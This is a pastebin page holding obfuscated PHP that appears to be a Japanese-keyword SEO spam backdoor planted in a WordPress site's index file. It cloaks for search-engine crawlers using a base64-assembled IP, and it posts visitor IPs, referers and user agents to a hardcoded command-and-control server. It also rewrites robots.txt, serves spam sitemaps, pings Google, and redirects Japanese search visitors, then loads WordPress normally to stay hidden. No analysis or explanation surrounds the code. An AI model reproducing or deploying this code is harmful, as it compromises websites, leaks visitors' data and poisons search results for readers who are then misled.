Facebook
From k, 11 Months ago, written in PHP.
Embed
Download Paste or View Raw
Hits: 367
  1. <?php
  2. goto jVHDK;
  3. fu1F4:
  4. $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"];
  5. goto UZcpa;
  6. jVHDK:
  7. goto fu1F4;
  8. NNhkB:
  9. if (
  10.     strpos($botbotbotbot, "oogle") or
  11.     strpos($botbotbotbot, "ing") or
  12.     strpos($botbotbotbot, "ahoo")
  13. ) {
  14.     $xxx = base64_decode("NjU=");
  15.     $xxx1 = base64_decode("MjE=");
  16.     $xxx2 = base64_decode("MjM1");
  17.     $xxx3 = base64_decode("MjUx");
  18.     $xxx4 = base64_decode("aW5wdXQ=");
  19.     $xxx0 = base64_decode("aHR0cDovLw==");
  20.     $xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3;
  21.     $xxx11 =
  22.         $xxx4 .
  23.         "/?useragent=" .
  24.         $botbotbotbot .
  25.         "&domain;=" .
  26.         $_SERVER["HTTP_HOST"];
  27.     $url = $xxx0 . $xxx00 . "/" . $xxx11;
  28.     $ch = curl_init();
  29.     curl_setopt($ch, CURLOPT_URL, $url);
  30.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  31.     $result = curl_exec($ch);
  32.    curl_close($ch);
  33.     echo $result;
  34.     if (strpos($result, "href=") < 1) {
  35.         $result = @file_get_contents(" {
  36. $url}
  37. ");
  38.        echo $result;
  39.    }
  40. }
  41. goto bSDgS;
  42. UZcpa:
  43. $botbotbotbot = str_replace(" ", "-", $botbotbotbot);
  44. goto NNhkB;
  45. bSDgS:
  46. ?>  
  47.  
  48.  
  49. <?php
  50. $OOOOOO =
  51.    "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?&gt; <.-=:/1230654879';()&^$[]%{}!*|+,";
  52. global $O;
  53. $O = urldecode($OOOOOO);
  54. $oOooOO = "z30912_2";
  55. $c2_root = "http://199.168.102.234/" . $oOooOO . "/";
  56. function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo)
  57. {
  58.     $ooooOOOooOo = curl_init();
  59.     curl_setopt($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
  60.     curl_setopt($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
  61.     curl_setopt($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
  62.     $oooooOOOOooO = curl_exec&#40;$ooooOOOooOo&#41;;
  63.    curl_close($ooooOOOooOo);
  64.     return $oooooOOOOooO;
  65. }
  66. function ooOOoOOO($OooooO, $OOOoooo = [])
  67. {
  68.     global $O;
  69.     $OooooO = str_replace(" ", "+", $OooooO);
  70.     $OOooooO = curl_init();
  71.     curl_setopt($OOooooO, CURLOPT_URL, "$OooooO");
  72.     curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1);
  73.     curl_setopt($OOooooO, CURLOPT_HEADER, 0);
  74.     curl_setopt($OOooooO, CURLOPT_TIMEOUT, 10);
  75.     curl_setopt($OOooooO, CURLOPT_POST, 1);
  76.     curl_setopt($OOooooO, CURLOPT_POSTFIELDS, http_build_query($OOOoooo));
  77.     $OOOOooo = curl_exec&#40;$OOooooO&#41;;
  78.    $OOOOoooOO = curl_errno($OOooooO);
  79.     curl_close($OOooooO);
  80.     if (0 !== $OOOOoooOO) {
  81.         return false;
  82.     }
  83.     return $OOOOooo;
  84. }
  85. function oooOOOo($ooOOo)
  86. {
  87.     global $O;
  88.     $ooOOOOo = false;
  89.     $oooooOOo = "googlebot+google+yahoo+bing+aol";
  90.     if ($ooOOo != "") {
  91.         if (preg_match("/($oooooOOo)/si", $ooOOo)) {
  92.             $ooOOOOo = true;
  93.         }
  94.     }
  95.     return $ooOOOOo;
  96. }
  97. function oooOOooOOoOO($oOOOOOOoOOOO)
  98. {
  99.     global $O;
  100.     $ooOOOOOOoO = false;
  101.     $ooOOOOOOoOo = "google.co.jp+yahoo.co.jp+google.com";
  102.     if (
  103.         $oOOOOOOoOOOO != "" &&
  104.         preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO)
  105.     ) {
  106.         $ooOOOOOOoO = true;
  107.     }
  108.     return $ooOOOOOOoO;
  109. }
  110. $protocol =
  111.     isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== off
  112.         ? "https://"
  113.         : "http://";
  114. $req_uri = $_SERVER["REQUEST_URI"];
  115. $host = $_SERVER["HTTP_HOST"];
  116. $php_self = $_SERVER["PHP_SELF"];
  117. $server_name = $_SERVER["SERVER_NAME"];
  118. $req_url = $protocol . $host . $req_uri;
  119. $c2_indata = $c2_root . "/indata.php";
  120. $c2_map = $c2_root . "/map.php";
  121. $c2_jump = $c2_root . "/jump.php";
  122. $c2_words = $c2_root . "/words.php";
  123. $c2_robots = $c2_root . "/robots.php";
  124. $post_data["user_agent"] = strtolower(
  125.     isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ""
  126. );
  127. $oooOoOOooOoooOOOoOoOoOoOoO = strtolower(
  128.     isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ""
  129. );
  130. $post_data["http_user_agent"] = $oooOoOOooOoooOOOoOoOoOoOoO;
  131. $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"])
  132.     ? $_SERVER["HTTP_REFERER"]
  133.     : "";
  134. $ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"];
  135. $post_data["ip"] = $ooooOOOOoooOOOoooOOO;
  136. $post_data["referer"] = $oooOOOooOoooOOOooooOoOoOoOoO;
  137. if (strpos($req_uri, ".php")) {
  138.     $req_href = $protocol . $host . $php_self;
  139. } else {
  140.     $req_href = $protocol . $host;
  141. }
  142. $post_data[] = [];
  143. $post_data["domain"] = $host;
  144. $post_data["req_uri"] = $req_uri;
  145. $post_data["href"] = $req_href;
  146. $post_data["req_url"] = $req_url;
  147. if (substr($req_uri, -6) == "robots") {
  148.     $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($c2_robots, $post_data);
  149.     define("BASE_PATH", str_ireplace($_SERVER["PHP_SELF"], "", __FILE__));
  150.     file_put_contents("BASE_PATH" . "/robots.txt", $ooooooooOOOOOoooOoOoooOO);
  151.     $ooooooooOOOOOoooOoOoooOO = file_get_contents&#40;"BASE_PATH" . "/robots.txt"&#41;;
  152.    if (strpos($ooooooooOOOOOoooOoOoooOO, ".xml")) {
  153.         echo "robots.txt file create success*";
  154.     } else {
  155.         echo "robots.txt file create fail*";
  156.     }
  157.     exit();
  158. }
  159. if (substr($req_uri, -4) == ".xml") {
  160.     if (strpos($req_uri, "pingsitemap.xml")) {
  161.         $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data);
  162.         $ooooooOOoooOOOooooOOO = explode(",", $ooooooOoOoooOOOooooO);
  163.         $ooooooOOoooOOOooooOOO[] = "sitemap";
  164.         for (
  165.             $ooooooOOoooOOOooooOOOOo = 0;
  166.             $ooooooOOoooOOOooooOOOOo < count($ooooooOOoooOOOooooOOO);
  167.             $ooooooOOoooOOOooooOOOOo++
  168.         ) {
  169.             if (strpos($req_href, ".php") > 0) {
  170.                 $ooooooOOoooOOOooooOOOOoo = "?";
  171.             } else {
  172.                 $ooooooOOoooOOOooooOOOOoo = "/";
  173.             }
  174.             $ooooooOOOoooOOOooooOOOOOoo =
  175.                 $req_href .
  176.                 $ooooooOOoooOOOooooOOOOoo .
  177.                 $ooooooOOoooOOOooooOOO[$ooooooOOoooOOOooooOOOOo] .
  178.                 ".xml";
  179.             $ooooooOOOOoooOOOooooOOOOOo =
  180.                 "https://www.google.com/ping?sitemap=" .
  181.                 $ooooooOOOoooOOOooooOOOOOoo;
  182.             $ooooooOOOOoooOOOooooOOOOOoOooOoOo =
  183.                 "http://www.google.com/ping?sitemap=" .
  184.                 $ooooooOOOoooOOOooooOOOOOoo;
  185.             if (
  186.                 stristr(
  187.                     @file_get_contents&#40;$ooooooOOOOoooOOOooooOOOOOo&#41;,
  188.                    "successfully"
  189.                 )
  190.             ) {
  191.                 echo $ooooooOOOOoooOOOooooOOOOOo .
  192.                     "===>Submitting Google Sitemap: OKPHP_EOL";
  193.             } elseif (
  194.                 stristr(
  195.                     @ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOo),
  196.                     "successfully"
  197.                 )
  198.             ) {
  199.                 echo $ooooooOOOOoooOOOooooOOOOOo .
  200.                     "===>Submitting Google Sitemap: OKPHP_EOL";
  201.             } elseif (
  202.                 stristr(
  203.                     @file_get_contents&#40;$ooooooOOOOoooOOOooooOOOOOoOooOoOo&#41;,
  204.                    "successfully"
  205.                 )
  206.             ) {
  207.                 echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo .
  208.                     "===>Submitting Google Sitemap: OKPHP_EOL";
  209.             } elseif (
  210.                 stristr(
  211.                     @ooooooooOOOOOOOOoooooOOO(
  212.                         $ooooooOOOOoooOOOooooOOOOOoOooOoOo
  213.                     ),
  214.                     "successfully"
  215.                 )
  216.             ) {
  217.                 echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo .
  218.                     "===>Submitting Google Sitemap: OKPHP_EOL";
  219.             } else {
  220.                 echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo .
  221.                     "===>Submitting Google Sitemap: failPHP_EOL";
  222.             }
  223.         }
  224.         exit();
  225.     }
  226.     if (
  227.         strpos($req_uri, "allsitemap.xml") ||
  228.         strpos($req_uri, "sitemap-index.xml") ||
  229.         strpos($req_uri, "sitemap-index-1.xml")
  230.     ) {
  231.         $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data);
  232.         header("Content-type:text/xml");
  233.         echo $ooooooOoOoooOOOooooO;
  234.         exit();
  235.     }
  236.     if (strpos($req_uri, ".php")) {
  237.         $ooooooOOoOOoooOOOooooOOOOO = explode("?", $req_uri);
  238.         $ooooooOOoOOoooOOOooooOOOOO =
  239.             $ooooooOOoOOoooOOOooooOOOOO[count($ooooooOOoOOoooOOOooooOOOOO) - 1];
  240.         $ooooooOOoOOoooOOOooooOOOOO = str_replace(
  241.             ".xml",
  242.             "",
  243.             $ooooooOOoOOoooOOOooooOOOOO
  244.         );
  245.     } else {
  246.         $ooooooOOoOOoooOOOooooOOOOO = str_replace("/", "", $req_uri);
  247.         $ooooooOOoOOoooOOOooooOOOOO = str_replace(
  248.             ".xml",
  249.             "",
  250.             $ooooooOOoOOoooOOOooooOOOOO
  251.         );
  252.     }
  253.     $post_data["word"] = $ooooooOOoOOoooOOOooooOOOOO;
  254.     $post_data["action"] = "check_sitemap";
  255.     $ooooooOOoOoOoooOOOooooOOoOOO = ooOOoOOO($c2_words, $post_data);
  256.     if ($ooooooOOoOoOoooOOOooooOOoOOO == "1") {
  257.         $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data);
  258.         header("Content-type:text/xml");
  259.         echo $ooooooOoOoooOOOooooO;
  260.         exit();
  261.     }
  262.     $post_data["action"] = "check_words";
  263.     $ooooooOOoOoOoooOOOooooOOoOoOO = ooOOoOOO($c2_words, $post_data);
  264.     if (
  265.         strpos($req_uri, "map") > 0 ||
  266.         $ooooooOOoOoOoooOOOooooOOoOoOO == "1"
  267.     ) {
  268.         $post_data["action"] = "rand_xml";
  269.         $ooooooOOoOoOoooOOOooooOOoOOO = ooOOoOOO(
  270.             $c2_words,
  271.             $post_data
  272.         );
  273.         header("Content-type:text/xml");
  274.         echo $ooooooOOoOoOoooOOOooooOOoOOO;
  275.         exit();
  276.     }
  277. }
  278. if (strpos($req_uri, ".php")) {
  279.     $ooooooOOooOooOoooOOOooooOOoOoOO =
  280.         $protocol . $server_name . $php_self;
  281.     $post_data["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO;
  282. } else {
  283.     $ooooooOOooOooOoooOOOooooOOoOoOO = $protocol . $server_name;
  284.     $post_data["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO;
  285. }
  286. $ooooOoOOooOoooOOOoOoOoOoO = oooOOooOOoOO($oooOOOooOoooOOOooooOoOoOoOoO);
  287. if (strpos($_SERVER["REQUEST_URI"], ".php")) {
  288.     $ooooooooOOOOOOOO = "?";
  289. } else {
  290.     $ooooooooOOOOOOOO = "/";
  291. }
  292. if (
  293.     $ooooOoOOooOoooOOOoOoOoOoO &&
  294.     (preg_match("/ja/i", @$_SERVER["HTTP_ACCEPT_LANGUAGE"]) ||
  295.         preg_match("/jp/i", @$_SERVER["HTTP_ACCEPT_LANGUAGE"]) ||
  296.         preg_match(
  297.             "/^[a-z0-9]+[0-9]+$/",
  298.             end(
  299.                 explode(
  300.                     $ooooooooOOOOOOOO,
  301.                     str_replace([".html", ".htm"], "", $_SERVER["REQUEST_URI"])
  302.                 )
  303.             )
  304.         ))
  305. ) {
  306.     echo ooOOoOOO($c2_jump, $post_data);
  307.     exit();
  308. }
  309. $oooOoOooOooOoooOOOoOoOoOoOo = oooOOOo($oooOoOOooOoooOOOoOoOoOoOoO);
  310. if ($oooOoOooOooOoooOOOoOoOoOoOo) {
  311.     $ooooooOOOOOoooOOOOooooooO = ooOOoOOO($c2_indata, $post_data);
  312.     if ($ooooooOOOOOoooOOOOooooooO == 404) {
  313.         header("HTTP/1.0 404 Not Found");
  314.         exit();
  315.     } elseif ($ooooooOOOOOoooOOOOooooooO == 500) {
  316.         header("HTTP/1.0 500 Internal Server Error");
  317.         exit();
  318.     } elseif ($ooooooOOOOOoooOOOOooooooO == "blank") {
  319.         echo "";
  320.         exit();
  321.     } else {
  322.         echo $ooooooOOOOOoooOOOOooooooO;
  323.         exit();
  324.     }
  325. } else {
  326.     header("HTTP/1.0 404 Not Found");
  327. }
  328. define("WP_USE_THEMES", true);
  329. require __DIR__ . "/wp-blog-header.php";
  330. ?&gt;
  331. >